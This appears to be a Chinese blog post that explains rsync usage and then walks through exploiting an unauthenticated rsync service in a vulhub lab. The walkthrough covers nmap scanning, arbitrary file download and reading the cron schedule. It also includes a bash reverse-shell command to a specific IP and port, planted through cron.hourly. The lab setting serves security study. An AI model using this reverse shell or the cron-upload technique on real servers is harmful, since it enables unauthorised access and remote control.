rsync

介绍

rsync 是一个用于文件和目录同步的强大工具,常用于在本地或远程主机之间复制和同步文件。它不仅支持局域网内的快速文件传输,还可以通过 SSH 进行远程同步。rsync 的主要特点是增量同步,即只传输发生变化的文件部分,从而提高传输效率

如何rsync配置不当,会造成任何人可以未授权访问上传下载服务器文件。端口873

rsync相关命令

(1)本地文件同步

/path/to/source/ 文件夹同步到 /path/to/destination/ 文件夹:

复制代码
rsync -av /path/to/source/ /path/to/destination/

(2)通过SSH同步文件到远程主机

将本地 /path/to/source/ 同步到远程主机 remote_host/path/to/destination/ 目录:

复制代码
rsync -avz -e ssh /path/to/source/ user@remote_host:/path/to/destination/

(3)从远程主机同步文件到本地

将远程主机 remote_host/path/to/source/ 目录同步到本地 /path/to/destination/

复制代码
rsync -avz -e ssh user@remote_host:/path/to/source/ /path/to/destination/

(4)删除目标中文件没有的内容

同步本地文件夹 /path/to/source//path/to/destination/,并删除目标目录中源目录没有的文件:

复制代码
rsync -av --delete /path/to/source/ /path/to/destination/

环境

vulhub漏洞docker

漏洞利用

进入环境

nmap主机发现

发现是136的主机,进行全端口的扫描

-sT -sV -O 对873端口扫描服务的端口信息(操作系统版本)

nmap脚本扫描是否存在RSYNC的未授权访问(有)

用rsync的命令工具命令读取文件

查看src模块下的文件

进行任意文件的下载

任意文件下载

在攻击机看到已经下载在kali机的目录下了

查看文件的信息

查看定时任务并下载在kali里

查看文件大概是17分钟用一个/etc/cron.hourly

创建一个shell并写入反弹命令(/bin/bash -i >& /dev/tcp/47.100.167.248/1111 0>&1(写在shell文件里面)

查看写入的命令

nc监听

上传shell

如果文章有错请各位大佬指正

相关推荐
速盾cdn40 分钟前
速盾:高防CDN还有哪些冷知识?
网络·web安全
格调UI成品2 小时前
预警系统安全体系构建:数据加密、权限分级与误报过滤方案
大数据·运维·网络·数据库·安全·预警
愚润求学5 小时前
【Linux】网络基础
linux·运维·网络
m0_738120726 小时前
玄机——某学校系统中挖矿病毒应急排查
网络·安全·web安全
yenggd9 天前
动态ds-vnp之normal和shortcut两种方式配置案例
网络·华为
Jackilina_Stone9 天前
【网工】华为配置专题进阶篇⑤
网络·华为·网工
Not Talk10 天前
内部网关协议配置实验
网络
PHP武器库10 天前
[Hestia]开源网络服务器控制面板,快速、可靠、开源
运维·服务器·网络·开源·php
(:满天星:)10 天前
Redis哨兵模式深度解析与实战部署
linux·服务器·网络·数据库·redis·缓存·centos
芊言芊语10 天前
汽车 NVM 请求失败原因分析及解决方法
网络